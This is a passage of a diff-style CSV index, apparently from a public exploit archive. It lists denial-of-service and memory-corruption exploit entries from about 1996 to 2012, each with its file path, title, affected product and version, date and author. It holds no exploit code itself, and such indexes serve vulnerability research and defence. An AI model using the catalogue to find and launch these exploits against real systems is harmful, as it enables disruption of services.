+18692,exploits/linux/dos/18692.rb,"SnackAmp 3.1.3 - '.aiff' Denial of Service",2012-04-01,"Ahmed Elhady Mohamed",dos,linux, +18719,exploits/windows/dos/18719.pl,"Play [EX] 2.1 - '.M3U'/'.PLS'/'.LST' Playlist File Denial of Service",2012-04-08,Death-Shadow-Dark,dos,windows, +18771,exploits/windows/dos/18771.txt,"SumatraPDF 2.0.1 - '.chm' / '.mobi' Memory Corruption",2012-04-23,shinnai,dos,windows, +18734,exploits/hardware/dos/18734.txt,"EMC IRM License Server 4.6.1.1995 - Denial of Service",2012-04-12,"Luigi Auriemma",dos,hardware, +18739,exploits/windows/dos/18739.txt,"IrfanView FlashPix PlugIn - Decompression Heap Overflow",2012-04-14,"Francis Provencher",dos,windows, +18751,exploits/hardware/dos/18751.txt,"Samsung D6000 TV - Multiple Vulnerabilities",2012-04-19,"Luigi Auriemma",dos,hardware, +18754,exploits/multiple/dos/18754.php,"LibreOffice 3.5.2.2 - Memory Corruption",2012-04-19,shinnai,dos,multiple, +18755,exploits/windows/dos/18755.c,"Microsoft Windows - 'afd.sys' Local Kernel (PoC) (MS11-046)",2012-04-19,fb1h2s,dos,windows, +18756,exploits/multiple/dos/18756.txt,"OpenSSL - ASN1 BIO Memory Corruption",2012-04-19,"Tavis Ormandy",dos,multiple, +18757,exploits/windows/dos/18757.txt,"VideoLAN VLC Media Player 2.0.1 - '.mp4' Crash (PoC)",2012-04-19,"Senator of Pirates",dos,windows, +18758,exploits/multiple/dos/18758.txt,"Wireshark - 'call_dissector()' Null Pointer Dereference Denial of Service",2012-04-19,Wireshark,dos,multiple, +18765,exploits/windows/dos/18765.txt,"Samsung NET-i ware 1.37 - Multiple Vulnerabilities",2012-04-22,"Luigi Auriemma",dos,windows, +18774,exploits/windows/dos/18774.txt,"Mobipocket Reader 6.2 Build 608 - Buffer Overflow",2012-04-23,shinnai,dos,windows, +18776,exploits/windows/dos/18776.txt,"BeyondCHM 1.1 - Buffer Overflow",2012-04-24,shinnai,dos,windows, +18777,exploits/windows/dos/18777.txt,"Microsoft .NET Framework EncoderParameter - Integer Overflow (MS12-025)",2012-04-24,"Akita Software Security",dos,windows, +18799,exploits/windows/dos/18799.py,"Remote-Anything Player 5.60.15 - Denial of Service",2012-04-29,"Saint Patrick",dos,windows, +18795,exploits/windows/dos/18795.py,"Nokia PC Suite Video Manager 7.1.180.64 - '.mp4' Denial of Service",2012-04-27,"Senator of Pirates",dos,windows, +18816,exploits/windows/dos/18816.py,"LAN Messenger 1.2.28 - Denial of Service",2012-05-01,"Julien Ahrens",dos,windows, +18817,exploits/hardware/dos/18817.py,"Mikrotik Router - Denial of Service",2012-05-01,PoURaN,dos,hardware, +18819,exploits/windows/dos/18819.cpp,"Microsoft Windows XP - 'win32k.sys' Local Kernel Denial of Service",2012-05-02,"Lufeng Li",dos,windows, +18864,exploits/windows/dos/18864.txt,"QNX phrelay/phindows/phditto - Multiple Vulnerabilities",2012-05-11,"Luigi Auriemma",dos,windows, +18851,exploits/windows/dos/18851.py,"Guitar Pro 6.1.1 r10791 - '.gpx' Crash (PoC)",2012-05-09,condis,dos,windows, +18852,exploits/windows/dos/18852.txt,"DecisionTools SharpGrid - ActiveX Control Remote Code Execution",2012-05-09,"Francis Provencher",dos,windows, +18853,exploits/windows/dos/18853.txt,"SAP NetWeaver Dispatcher - Multiple Vulnerabilities",2012-05-09,"Core Security",dos,windows, +18855,exploits/linux/dos/18855.txt,"Asterisk - 'ast_parse_digest()' Stack Buffer Overflow",2012-03-15,"Russell Bryant",dos,linux, +18879,exploits/windows/dos/18879.rb,"MultiMedia Builder 4.9.8 - '.mef' Denial of Service",2012-05-15,"Ahmed Elhady Mohamed",dos,windows, +18877,exploits/multiple/dos/18877.txt,"FlexNet License Server Manager - Stack Overflow In lmgrd",2012-05-14,"Luigi Auriemma",dos,multiple, +18878,exploits/windows/dos/18878.txt,"Pro-face Pro-Server EX WinGP PC Runtime - Multiple Vulnerabilities",2012-05-14,"Luigi Auriemma",dos,windows, +18890,exploits/multiple/dos/18890.txt,"Java - Trigerring Java Code from a .SVG Image",2012-05-16,"Nicolas Gregoire",dos,multiple, +18909,exploits/php/dos/18909.php,"PHP 5.4.3 - wddx_serialize_* / stream_bucket_* Variant Object Null Ptr Dereference",2012-05-21,condis,dos,php, +18894,exploits/windows/dos/18894.txt,"Microsoft Windows XP - Keyboard Layouts Pool Corruption (PoC) (MS12-034)",2012-05-18,Cr4sh,dos,windows, +18902,exploits/windows/dos/18902.rb,"Real-DRAW PRO 5.2.4 - Import File Crash",2012-05-21,"Ahmed Elhady Mohamed",dos,windows, +18903,exploits/windows/dos/18903.rb,"DVD-Lab Studio 1.25 - '.DAL' File Open Crash",2012-05-21,"Ahmed Elhady Mohamed",dos,windows, +18910,exploits/php/dos/18910.php,"PHP 5.4.3 - 'com_event_sink' Denial of Service",2012-05-21,condis,dos,php, +18916,exploits/windows/dos/18916.txt,"Symantec End Point Protection 11.x / Symantec Network Access Control 11.x - Local Code Execution (PoC)",2012-05-23,41.w4r10r,dos,windows, +18918,exploits/multiple/dos/18918.txt,"Wireshark - DIAMETER Dissector Denial of Service",2012-05-24,Wireshark,dos,multiple, +18919,exploits/multiple/dos/18919.txt,"Wireshark - Multiple Dissector Denial of Service Vulnerabilities",2012-05-24,"Laurent Butti",dos,multiple, +18920,exploits/multiple/dos/18920.txt,"Wireshark - Misaligned Memory Denial of Service",2012-05-24,"Klaus Heckelmann",dos,multiple, +18926,exploits/windows/dos/18926.php,"bsnes 0.87 - Local Denial of Service",2012-05-25,"Yakir Wizman",dos,windows, +18931,exploits/ios/dos/18931.rb,"Apple iOS 5.1.1 Safari Browser - 'JS match()' / 'search()' Crash (PoC)",2012-05-25,"Alberto Ortega",dos,ios, +18945,exploits/windows/dos/18945.txt,"WinRadius Server 2009 - Denial of Service",2012-05-29,demonalex,dos,windows, +18946,exploits/windows/dos/18946.txt,"TFTPD32 DNS Server 4.00 - Denial of Service",2012-05-29,demonalex,dos,windows, +18940,exploits/windows/dos/18940.php,"LibreOffice 3.5.3 - '.rtf' FileOpen Crash",2012-05-28,shinnai,dos,windows, +18952,exploits/windows/dos/18952.txt,"Microsoft Wordpad 5.1 - '.doc' Null Pointer Dereference",2012-05-30,condis,dos,windows, +18956,exploits/windows/dos/18956.c,"GIMP 2.6 script-fu < 2.8.0 - Buffer Overflow",2012-05-31,"Joseph Sheridan",dos,windows, +18958,exploits/windows/dos/18958.html,"Sony VAIO Wireless Manager 4.0.0.0 - Buffer Overflow",2012-05-31,"High-Tech Bridge SA",dos,windows, +18962,exploits/windows/dos/18962.py,"Sorensoft Power Media 6.0 - Denial of Service",2012-05-31,Onying,dos,windows, +18964,exploits/windows/dos/18964.txt,"IrfanView 4.33 - Format PlugIn ECW Decompression Heap Overflow",2012-06-01,"Francis Provencher",dos,windows, +18972,exploits/windows/dos/18972.txt,"IrfanView 4.33 - Format PlugIn '.TTF' File Parsing Stack Based Overflow",2012-06-02,"Francis Provencher",dos,windows, +19000,exploits/windows/dos/19000.py,"Audio Editor Master 5.4.1.217 - Denial of Service",2012-06-06,Onying,dos,windows, +19034,exploits/windows/dos/19034.cpp,"PEamp - '.mp3' Memory Corruption (PoC)",2012-06-10,Ayrbyte,dos,windows, +19046,exploits/aix/dos/19046.txt,"AppleShare IP Mail Server 5.0.3 - Buffer Overflow",1999-10-15,"Chris Wedgwood",dos,aix, +19049,exploits/aix/dos/19049.txt,"BSDI 4.0 tcpmux / inetd - Crash",1998-04-07,"Mark Schaefer",dos,aix, +19064,exploits/hardware/dos/19064.txt,"F5 BIG-IP - Authentication Bypass (PoC)",2012-06-11,"Florent Daigniere",dos,hardware, +19075,exploits/linux/dos/19075.c,"APC PowerChute Plus 4.2.2 - Denial of Service",1998-04-10,Schlossnagle,dos,linux, +19076,exploits/linux/dos/19076.txt,"Apple Personal Web Sharing 1.1 - Remote Denial of Service",1998-04-10,"Netstat Webmaster",dos,linux, +19082,exploits/linux/dos/19082.txt,"AMD K6 Processor - Denial of Service",1998-06-01,Poulot-Cazajous,dos,linux, +19085,exploits/linux/dos/19085.c,"Linux Kernel 2.0/2.1 - Send a SIGIO Signal To Any Process",1998-06-30,"David Luyer",dos,linux, +19089,exploits/windows/dos/19089.txt,"Microsoft Windows OpenType Font - File Format Denial of Service",2012-06-12,Cr4sh,dos,windows, +19098,exploits/multiple/dos/19098.txt,"Apple iTunes 10.6.1.7 - '.m3u' Walking Heap Buffer Overflow",2012-06-13,LiquidWorm,dos,multiple, +19103,exploits/linux/dos/19103.c,"HP HP-UX 10.34 / Microsoft Windows 95/NT 3.5.1 SP1/NT 3.5.1 SP2/NT 3.5.1 SP3/NT 3.5.1 SP4/NT 4.0/NT 4.0 SP1/NT 4.0 SP2/NT 4.0 SP3 - Denial of Service",1997-11-13,"G P R",dos,linux, +19385,exploits/windows/dos/19385.txt,"IrfanView 4.33 - '.DJVU' Image Processing Heap Overflow",2012-06-24,"Francis Provencher",dos,windows, +19117,exploits/bsd/dos/19117.c,"Linux Kernel 2.0/2.1 (Digital UNIX 4.0 D / FreeBSD 2.2.4 / HP HP-UX 10.20/11.0 / IBM AIX 3.2.5 / NetBSD 1.2 / Solaris 2.5.1) - Smurf Denial of Service",1998-01-05,"T. Freak",dos,bsd, +19130,exploits/freebsd/dos/19130.c,"FreeBSD 3.0 - UNIX-domain Panic (Denial of Service)",1999-05-05,"Lukasz Luzar",dos,freebsd, +19137,exploits/hardware/dos/19137.rb,"Wyse - Unauthenticated Machine Remote Power Off (Denial of Service) (Metasploit)",2012-06-14,it.solunium,dos,hardware, +19413,exploits/windows/dos/19413.c,"Microsoft Windows 95/98 / NT Enterprise Server 4.0 SP5 / NT Terminal Server 4.0 SP4 / NT Workstation 4.0 SP5 - Denial of Service (1)",1999-07-03,Coolio,dos,windows, +19391,exploits/windows/dos/19391.py,"Slimpdf Reader 1.0 - Memory Corruption",2012-06-25,"Carlos Mario Penagos Hollmann",dos,windows, +19392,exploits/windows/dos/19392.py,"Able2Extract and Able2Extract Server 6.0 - Memory Corruption",2012-06-25,"Carlos Mario Penagos Hollmann",dos,windows, +19161,exploits/solaris/dos/19161.txt,"Solaris 2.5.1 - 'Ping' System Panic (Denial of Service)",1997-06-15,"Adam Caldwell",dos,solaris, +19181,exploits/windows/dos/19181.txt,"XnView - '.RAS' Image Processing Heap Overflow",2012-06-16,"Francis Provencher",dos,windows, +19182,exploits/windows/dos/19182.txt,"XnView - '.ECW' Image Processing Heap Overflow",2012-06-16,"Francis Provencher",dos,windows, +19183,exploits/windows/dos/19183.txt,"XnView - '.FlashPix' Image Processing Heap Overflow",2012-06-16,"Francis Provencher",dos,windows, +19184,exploits/windows/dos/19184.pl,"Karafun Player 1.20.86 - '.m3u' Crash (PoC)",2012-06-16,Styxosaurus,dos,windows, +19389,exploits/windows/dos/19389.txt,"Kingview Touchview 6.53 - Multiple Heap Overflow Vulnerabilities",2012-06-25,"Carlos Mario Penagos Hollmann",dos,windows, +19388,exploits/windows/dos/19388.py,"Kingview Touchview 6.53 - EIP Overwrite",2012-06-25,"Carlos Mario Penagos Hollmann",dos,windows,555 +19207,exploits/windows/dos/19207.txt,"Microsoft Outlook Express 4.27.3110/4.72.3120 - POP Denial of Service",1999-05-11,"Miquel van Smoorenburg",dos,windows, +19212,exploits/multiple/dos/19212.txt,"Behold! Software Web Page Counter 2.7 - Denial of Service",1999-05-19,"David Litchfield",dos,multiple, +19225,exploits/multiple/dos/19225.txt,"Compaq Client Management Agents 3.70/4.0 / Insight Management Agents 4.21 A/4.22 A/4.30 A / Intelligent Cluster Administrator 1.0 / Management Agents for Workstations 4.20 A / Server Management Agents 4.23 / Survey Utility 2.0 - Web File Access",1999-05-25,"Master Dogen",dos,multiple, +19228,exploits/multiple/dos/19228.pl,"Microsoft IIS 4.0 / Microsoft JET 3.5/3.5.1 Database Engine - VBA",1999-05-25,"J. Abreu Junior",dos,multiple, +19230,exploits/multiple/dos/19230.txt,"Symantec PCAnywhere32 8.0 - Denial of Service",1999-05-11,"Chris Radigan",dos,multiple, +19238,exploits/windows/dos/19238.txt,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3 - Denial of Service Duplicate Hostname",1999-06-04,"Carl Byington",dos,windows, +19241,exploits/linux/dos/19241.c,"Linux Kernel 2.2/2.3 (Debian Linux 2.1 / RedHat Linux 6.0 / SuSE Linux 6.1) - IP Options",1999-06-01,"Piotr Wilkin",dos,linux, +19250,exploits/linux/dos/19250.txt,"Linux Kernel 2.0/2.1/2.2 - 'autofs' Denial of Service",1999-02-19,"Brian Jones",dos,linux, +19265,exploits/windows/dos/19265.py,"Total Video Player 1.31 - '.m3u' Crash (PoC)",2012-06-18,0dem,dos,windows, +19271,exploits/linux/dos/19271.c,"Linux Kernel 2.0 - TCP Port Denial of Service",1999-01-19,"David Schwartz",dos,linux, +19272,exploits/linux/dos/19272.txt,"Linux Kernel 2.2 - 'ldd core' Force Reboot (Denial of Service)",1999-01-26,"Dan Burcaw",dos,linux, +19278,exploits/hp-ux/dos/19278.pl,"HP HP-UX 10.20 / IBM AIX 4.1.5 - 'connect()' Denial of Service",1997-03-05,"Cahya Wirawan",dos,hp-ux, +19282,exploits/linux/dos/19282.c,"Linux Kernel 2.0 Sendmail - Denial of Service",1999-05-28,"Michal Zalewski",dos,linux, +19289,exploits/windows/dos/19289.txt,"Samsung AllShare 2.1.1.0 - Null Pointer Dereference",2012-06-19,"Luigi Auriemma",dos,windows, +19290,exploits/multiple/dos/19290.txt,"Airlock WAF 4.2.4 - Overlong UTF-8 Sequence Bypass",2012-06-19,"SEC Consult",dos,multiple, +19301,exploits/linux/dos/19301.c,"Linux Kernel 2.0.33 - IP Fragment Overlap",1998-04-17,"Michal Zalewski",dos,linux, +19308,exploits/linux/dos/19308.c,"Linux Kernel 2.0/2.0.33 - i_count Overflow (PoC)",1998-01-14,"Aleph One",dos,linux, +19410,exploits/windows/dos/19410.py,"Qbik WinGate 3.0/Pro 4.0.1/Standard 4.0.1 - Buffer Overflow Denial of Service",1999-02-22,Prizm,dos,windows, +19326,exploits/solaris/dos/19326.txt,"Sun Solaris 7.0 - 'procfs' Denial of Service",1999-03-09,"Toomas Soome",dos,solaris, +19328,exploits/windows/dos/19328.txt,"Qutecom SoftPhone 2.2.1 - Heap Overflow Crash (Denial of Service) PoC)",2012-06-22,"Debasish Mandal",dos,windows, +19331,exploits/windows/dos/19331.txt,"ACDSee PRO 5.1 - '.RLE' Image Processing Heap Overflow",2012-06-22,"Francis Provencher",dos,windows, +19332,exploits/windows/dos/19332.txt,"ACDSee PRO 5.1 - '.PCT' Image Processing Heap Overflow",2012-06-22,"Francis Provencher",dos,windows, +19333,exploits/windows/dos/19333.txt,"ACDSee PRO 5.1 - '.gif' Image Processing Heap Overflow",2012-06-22,"Francis Provencher",dos,windows, +19334,exploits/windows/dos/19334.txt,"ACDSee PRO 5.1 - '.CUR' Image Processing Heap Overflow",2012-06-22,"Francis Provencher",dos,windows, +19335,exploits/windows/dos/19335.txt,"XnView 1.98.8 - '.gif' Image Processing Heap Overflow",2012-06-22,"Francis Provencher",dos,windows, +19336,exploits/windows/dos/19336.txt,"XnView 1.98.8 - '.PCT' Image Processing Heap Overflow",2012-06-22,"Francis Provencher",dos,windows, +19337,exploits/windows/dos/19337.txt,"XnView 1.98.8 - '.tiff' Image Processing Heap Overflow (1)",2012-06-22,"Francis Provencher",dos,windows, +19338,exploits/windows/dos/19338.txt,"XnView 1.98.8 - '.tiff' Image Processing Heap Overflow (2)",2012-06-22,"Francis Provencher",dos,windows, +19340,exploits/windows/dos/19340.txt,"Lattice Diamond Programmer 1.4.2 - Buffer Overflow",2012-06-22,"Core Security",dos,windows, +19357,exploits/irix/dos/19357.sh,"SGI IRIX 6.2 - SpaceWare",1996-10-30,"J.A. Guitierrez",dos,irix, +19368,exploits/multiple/dos/19368.sh,"Lotus Domino 4.6.1/4.6.4 Notes - SMTPA MTA Mail Relay",1999-06-15,"Robert Lister",dos,multiple, +19372,exploits/windows/dos/19372.txt,"Microsoft Windows NT 4.0/SP 1/SP 2/SP 3/SP 4/SP 5 - Null Session Admin Name",1999-06-28,"J D Glaser",dos,windows, +19382,exploits/multiple/dos/19382.txt,"Ipswitch IMail 5.0 - Whois32 Daemon Buffer Overflow Denial of Service",1999-03-01,"Marc of eEye",dos,multiple, +19377,exploits/multiple/dos/19377.txt,"Ipswitch IMail 5.0 - Imapd Buffer Overflow Denial of Service",1999-03-01,"Marc of eEye",dos,multiple, +19378,exploits/multiple/dos/19378.txt,"Ipswitch IMail 5.0 - LDAP Buffer Overflow Denial of Service",1999-03-01,"Marc of eEye",dos,multiple, +19379,exploits/multiple/dos/19379.txt,"Ipswitch IMail 5.0 - IMonitor Buffer Overflow Denial of Service",1999-03-01,"Marc of eEye",dos,multiple, +19380,exploits/multiple/dos/19380.txt,"Ipswitch IMail 5.0/6.0 - Web Service Buffer Overflow Denial of Service",1999-03-01,"Marc of eEye",dos,multiple, +19393,exploits/windows/dos/19393.py,"Able2Doc and Able2Doc Professional 6.0 - Memory Corruption",2012-06-25,"Carlos Mario Penagos Hollmann",dos,windows, +29039,exploits/windows/dos/29039.py,"Kerio MailServer 5.x/6.x - Remote LDAP Denial of Service",2006-11-15,"Evgeny Legerov",dos,windows, +19409,exploits/windows/dos/19409.txt,"Sielco Sistemi Winlog 2.07.16 - Multiple Vulnerabilities",2012-06-27,"Luigi Auriemma",dos,windows, +19414,exploits/windows/dos/19414.c,"Microsoft Windows 95/98 / NT Enterprise Server 4.0 SP5 / NT Terminal Server 4.0 SP4 / NT Workstation 4.0 SP5 - Denial of Service (2)",1999-07-03,klepto,dos,windows, +19415,exploits/windows/dos/19415.c,"Microsoft Windows 95/98 / NT Enterprise Server 4.0 SP5 / NT Terminal Server 4.0 SP4 / NT Workstation 4.0 SP5 - Denial of Service (3)",1999-04-06,"Rob Mosher",dos,windows, +19416,exploits/windows/dos/19416.c,"Netscape Enterprise Server 3.6 - SSL Buffer Overflow Denial of Service",1999-07-06,"Arne Vidstrom",dos,windows, +19423,exploits/bsd/dos/19423.c,"BSD/Linux Kernel 2.3 (BSD/OS 4.0 / FreeBSD 3.2 / NetBSD 1.4) - Shared Memory Denial of Service",1999-07-15,"Mike Perry",dos,bsd, +19436,exploits/hardware/dos/19436.txt,"Check Point Software Firewall-1 3.0/1 4.0 - Table Saturation Denial of Service",1999-07-29,"Lance Spitzner",dos,hardware, +19441,exploits/hardware/dos/19441.c,"Network Associates Gauntlet Firewall 5.0 - Denial of Service",1999-07-30,"Mike Frantzen",dos,hardware, +19445,exploits/windows/dos/19445.txt,"Microsoft FrontPage Personal Web Server 1.0 - PWS Denial of Service",1999-08-08,Narr0w,dos,windows, +19446,exploits/multiple/dos/19446.pl,"WebTrends Enterprise Reporting Server 1.5 - Negative Content Length Denial of Service",1999-08-08,rpc,dos,multiple, +19453,exploits/windows/dos/19453.cpp,"PC Tools Firewall Plus 7.0.0.123 - Local Denial of Service",2012-06-29,0in,dos,windows, +19456,exploits/windows/dos/19456.txt,"PowerNet Twin Client 8.9 - 'RFSync 1.0.0.1' Crash (PoC)",2012-06-29,"Luigi Auriemma",dos,windows, +19457,exploits/multiple/dos/19457.txt,"Microsoft Commercial Internet System 2.0/2.5 / IIS 4.0 / Site Server Commerce Edition 3.0 alpha/3.0 - Denial of Service",1999-08-11,"Nobuo Miwa",dos,multiple, +19463,exploits/linux/dos/19463.c,"SuSE Linux 6.2 / Slackware Linux 3.2/3.6 - 'identd' Denial of Service",1999-08-16,friedolin,dos,linux, +19471,exploits/windows/dos/19471.html,"Microsoft Internet Explorer 5 - HTML Form Control Denial of Service",1999-08-27,"Neon Bunny",dos,windows, +19477,exploits/hardware/dos/19477.txt,"TFS Gateway 4.0 - Denial of Service",1999-08-31,anonymous,dos,hardware, +19482,exploits/multiple/dos/19482.txt,"GIMP 2.8.0 - '.FIT' File Format Denial of Service",2012-06-30,"Joseph Sheridan",dos,multiple, +19483,exploits/windows/dos/19483.txt,"IrfanView JLS Formats PlugIn - Heap Overflow",2012-06-30,"Joseph Sheridan",dos,windows, +19488,exploits/bsd/dos/19488.c,"FreeBSD 5.0 / NetBSD 1.4.2 / OpenBSD 2.7 - 'setsockopt()' Denial of Service",1999-09-05,"L. Sassaman",dos,bsd, +19489,exploits/windows/dos/19489.txt,"Microsoft Windows NT 4.0 - DCOM Server",1999-09-08,Mnemonix,dos,windows, +19505,exploits/freebsd/dos/19505.c,"FreeBSD 3.0/3.1/3.2 - 'vfs_cache' Denial of Service",1999-09-22,"Charles M. Hannum",dos,freebsd, +19507,exploits/solaris/dos/19507.txt,"Solaris 7.0 - Recursive mutex_enter Remote Panic (Denial of Service)",1999-09-23,"David Brumley",dos,solaris, +19513,exploits/hardware/dos/19513.txt,"Eicon Networks DIVA LAN ISDN Modem 1.0 Release 2.5/1.0/2.0 - Denial of Service",1999-09-27,"Bjorn Stickler",dos,hardware, +19531,exploits/hardware/dos/19531.txt,"Cisco IOS 12.0.2 - Syslog Crash",1999-01-11,"Olaf Selke",dos,hardware, +19536,exploits/multiple/dos/19536.txt,"Apache 1.1 / NCSA httpd 1.5.2 / Netscape Server 1.12/1.1/2.0 - a nph-test-cgi",1996-12-10,"Josh Richards",dos,multiple, +19541,exploits/novell/dos/19541.txt,"Novell Client 3.0/3.0.1 - Denial of Service",1999-10-08,"Bruce Dennison",dos,novell, +19562,exploits/windows/dos/19562.pl,"MediaHouse Software Statistics Server 4.28/5.1 - 'Server ID' Buffer Overflow",1999-09-30,"Per Bergehed",dos,windows, +19563,exploits/windows/dos/19563.txt,"Photodex ProShow Producer 5.0.3256 - Buffer Overflow",2012-07-03,"Julien Ahrens",dos,windows, +19564,exploits/bsd/dos/19564.c,"Axent Raptor 6.0 - Denial of Service",1999-10-21,MSG.Net,dos,bsd, +19569,exploits/windows/dos/19569.pl,"WFTPD 2.34/2.40/3.0 - Remote Buffer Overflow (PoC)",1999-10-28,"Alberto Soli",dos,windows, +19571,exploits/multiple/dos/19571.c,"Netscape Messaging Server 3.6/3.54/3.55 - 'RCPT TO' Denial of Service",1999-10-28,"Nobuo Miwa",dos,multiple, +19575,exploits/windows/dos/19575.txt,".NET Framework - Tilde Character Denial of Service",2012-07-04,"Soroush Dalili",dos,windows, +19577,exploits/windows/dos/19577.py,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 - 'Services.exe' Denial of Service (1)",1999-10-31,nas,dos,windows, +19578,exploits/windows/dos/19578.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 - 'Services.exe' Denial of Service (2)",1999-10-31,.rain.forest.puppy,dos,windows, +19675,exploits/linux/dos/19675.c,"Linux Kernel 2.0.x (Debian 2.1 / RedHat 5.2) - Packet Length with Options",1999-12-08,"Andrea Arcangeli",dos,linux, +19596,exploits/windows/dos/19596.txt,"Byte Fusion BFTelnet 1.1 - Long Username Denial of Service",1999-11-03,"Ussr Labs",dos,windows, +19605,exploits/linux/dos/19605.c,"Linux Kernel 3.2.24 - 'fs/eventpoll.c' Local Denial of Service",2012-07-05,"Yurij M. Plotnikov",dos,linux, +19615,exploits/unix/dos/19615.c,"ISC BIND 8.2.2 / IRIX 6.5.17 / Solaris 7.0 - NXT Overflow / Denial of Service",1999-11-10,"ADM Crew",dos,unix, +19616,exploits/windows/dos/19616.c,"Ipswitch IMail 5.0.5/5.0.6/5.0.7 - POP3 Denial of Service / Buffer Overflow",1999-11-08,Interrupt,dos,windows, +19619,exploits/windows/dos/19619.txt,"QPC Software QVT Term 4.3/QVT/Net 4.3 Suite FTP Server - Denial of Service",1999-11-10,"Ussr Labs",dos,windows, +19624,exploits/windows/dos/19624.txt,"Gene6 G6 FTP Server 2.0 - Buffer Overflow Denial of Service",1999-11-17,"Ussr Labs",dos,windows, +19635,exploits/solaris/dos/19635.c,"Sun Solaris 7.0 - rpc.ttdbserver Denial of Service",1999-11-19,"Elias Levy",dos,solaris, +19636,exploits/windows/dos/19636.txt,"Dick Lin ZetaMail 2.1 - Login Denial of Service",1999-11-18,"Ussr Labs",dos,windows, +19638,exploits/windows/dos/19638.c,"Microsoft SQL Server 7.0/7.0 SP1 - NULL Data Denial of Service",1999-11-19,"Kevork Belian",dos,windows, +19639,exploits/windows/dos/19639.txt,"Alt-N MDaemon 2.8.5 - WebConfig Overflow Denial of Service",1999-11-24,"Ussr Labs",dos,windows, +19640,exploits/windows/dos/19640.txt,"Alt-N WorldClient Pro 2.0.0.0/2.0.1.0/Standard 2.0.0.0 - Long URL Denial of Service",1999-11-26,"Ussr Labs",dos,windows, +19664,exploits/windows/dos/19664.txt,"Cat Soft Serv-U FTP Server 2.5a - SITE PASS Denial of Service",1999-12-02,"Ussr Labs",dos,windows, +19666,exploits/windows/dos/19666.txt,"GoodTech Telnet Server NT 2.2.1 - Denial of Service",1999-12-06,"Ussr Labs",dos,windows, +19681,exploits/solaris/dos/19681.txt,"Solaris 7.0 - DMI Denial of Service",1999-12-22,"Brock Tellier",dos,solaris, +19687,exploits/freebsd/dos/19687.c,"Real Networks Real Server 5.0 - ramgen Denial of Service",1999-12-23,bow,dos,freebsd, +19695,exploits/windows/dos/19695.txt,"Michael Lamont Savant Web Server 2.0 - NULL Character Denial of Service",1999-12-28,"Ussr Labs",dos,windows, +19701,exploits/linux/dos/19701.sh,"Eric Allman Sendmail 8.9.1/8.9.3 - ETRN Denial of Service",1999-12-22,"Michal Zalewski",dos,linux, +19702,exploits/windows/dos/19702.txt,"BroadGun Software CamShot WebCam 2.5 - GET Buffer Overflow",1999-12-30,"Ussr Labs",dos,windows, +19703,exploits/windows/dos/19703.txt,"AnalogX SimpleServer:WWW 1.0.1 - GET Buffer Overflow",1999-12-31,"Ussr Labs",dos,windows, +19711,exploits/windows/dos/19711.txt,"Ipswitch IMail 5.0.8/6.0/6.1 - IMonitor 'status.cgi' Denial of Service",2000-01-05,"Ussr Labs",dos,windows, +19716,exploits/windows/dos/19716.txt,"Checkpoint Abra - Multiple Vulnerabilities",2012-07-10,"Andrey Komarov",dos,windows, +19720,exploits/windows/dos/19720.c,"NullSoft Winamp 2.10 - Playlist",2000-01-10,"Steve Fewer",dos,windows, +19725,exploits/windows/dos/19725.txt,"Nosque Workshop MsgCore 1.9 - Denial of Service",2000-01-13,"Ussr Labs",dos,windows, +19740,exploits/windows/dos/19740.c,"Jgaa WarFTPd 1.66 x4s/1.67-3 - 'CWD/MKD' Denial of Service",2000-02-03,crc,dos,windows, +19744,exploits/novell/dos/19744.txt,"Novell Groupwise Enhancement Pack 5.5 Enhancement Pack - Denial of Service",2000-02-07,"Adam Gray",dos,novell, +19746,exploits/novell/dos/19746.txt,"Novell BorderManager 3.0/3.5 Audit Trail Proxy - Denial of Service",2000-02-04,"Chicken Man",dos,novell, +19748,exploits/windows/dos/19748.txt,"True North Software Internet Anywhere Mail Server 3.1.3 - RETR Denial of Service",2000-02-10,"Nobuo Miwa",dos,windows, +19750,exploits/multiple/dos/19750.sh,"Netopia Timbuktu Pro Remote Control 2.0/5.2.1 - Denial of Service",2000-02-11,eth0,dos,multiple, +19755,exploits/windows/dos/19755.txt,"Pragma Systems InterAccess TelnetD Server 4.0 Build 4 - Buffer Overflow",2000-02-21,"Ussr Labs",dos,windows, +19759,exploits/windows/dos/19759.c,"Microsoft Windows Media Services 4.0/4.1 - Handshake Sequence Denial of Service",2000-01-18,"Kit Knox",dos,windows, +19760,exploits/windows/dos/19760.txt,"Pragma Systems InterAccess TelnetD Server 4.0 - Terminal Configuration",2000-02-24,"Ussr Labs",dos,windows, +19766,exploits/hardware/dos/19766.txt,"Nortel Networks Nautica Marlin - Denial of Service",2000-02-25,"Christophe GRENIER",dos,hardware, +19772,exploits/windows/dos/19772.txt,"WaveSurfer 1.8.8p4 - Memory Corruption (PoC)",2012-07-12,"Jean Pascal Pereira",dos,windows, +19777,exploits/windows/dos/19777.txt,"Microsoft Internet Explorer 9 / SharePoint / Lync - toStaticHTML HTML Sanitizing Bypass (MS12-037/MS12-039/MS12-050)",2012-07-12,"Adi Cohen",dos,windows, +19780,exploits/multiple/dos/19780.txt,"Trend Micro OfficeScan Corporate Edition 3.0/3.5/3.11/3.13 - Denial of Service",2000-02-26,"Jeff Stevens",dos,multiple, +19782,exploits/windows/dos/19782.pl,"HP OpenView OmniBack II 2.55/3.0/3.1 - Denial of Service",2000-02-28,"Jon Hittner",dos,windows, +19783,exploits/windows/dos/19783.txt,"Netscape Enterprise Server 3.6 SP2/FastTrack Server 2.0.1 - GET",1999-08-25,"ISS X-Force",dos,windows, +19799,exploits/windows/dos/19799.txt,"Microsoft Windows Server 2000/95/98/ME/NT 3.5.x/Enterprise Server 4.0/Terminal Server 4.0/Workstation 4.0 Microsoft DoS Device Name - Denial of Service",2000-03-04,anonymous,dos,windows, +19806,exploits/windows/dos/19806.c,"Atrium Software Mercur Mail Server 3.2 - Multiple Buffer Overflows (1)",2000-03-14,"Ussr Labs",dos,windows, +19807,exploits/windows/dos/19807.txt,"Atrium Software Mercur Mail Server 3.2 - Multiple Buffer Overflows (2)",2000-03-14,"Ussr Labs",dos,windows, +19810,exploits/windows/dos/19810.txt,"Atrium Software Mercur WebView WebMail-Client 1.0 - Buffer Overflow",2000-03-16,"Ussr Labs",dos,windows, +19817,exploits/ultrix/dos/19817.txt,"Data General DG/UX 5.4 - inetd Service Exhaustion Denial of Service",2000-03-16,"The Unicorn",dos,ultrix, +19818,exploits/linux/dos/19818.c,"Linux Kernel 2.2.12/2.2.14/2.3.99 (RedHat 6.x) - Socket Denial of Service",2000-03-23,"Jay 